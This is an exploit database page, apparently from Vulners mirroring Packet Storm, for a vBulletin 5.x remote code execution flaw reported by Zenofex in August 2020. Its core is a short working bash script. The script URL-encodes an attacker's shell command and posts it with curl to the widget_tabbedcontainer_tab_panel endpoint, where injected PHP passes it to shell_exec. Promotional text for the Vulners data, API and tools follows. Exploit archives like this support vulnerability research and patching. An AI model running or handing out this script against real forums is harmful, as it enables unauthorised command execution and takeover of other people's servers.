Lucene search
K

vBulletin 5.x Remote Code Execution

🗓️ 11 Aug 2020 00:00:00Reported by ZenofexType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 321 Views

vBulletin 5.x Remote Code Execution exploi

Related
Code
`#!/bin/bash  
#  
# vBulletin (widget_tabbedcontainer_tab_panel) 5.x 0day by @Zenofex  
#<br># Usage ./exploit <site> <shell-command><br>  
# Urlencode cmd  
CMD=`echo $2|perl -MURI::Escape -ne 'chomp;print uri_escape($_),"\n"'`  
  
# Send request  
curl -s $1/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("'+$CMD+'");exit;'  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Aug 2020 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.9443
321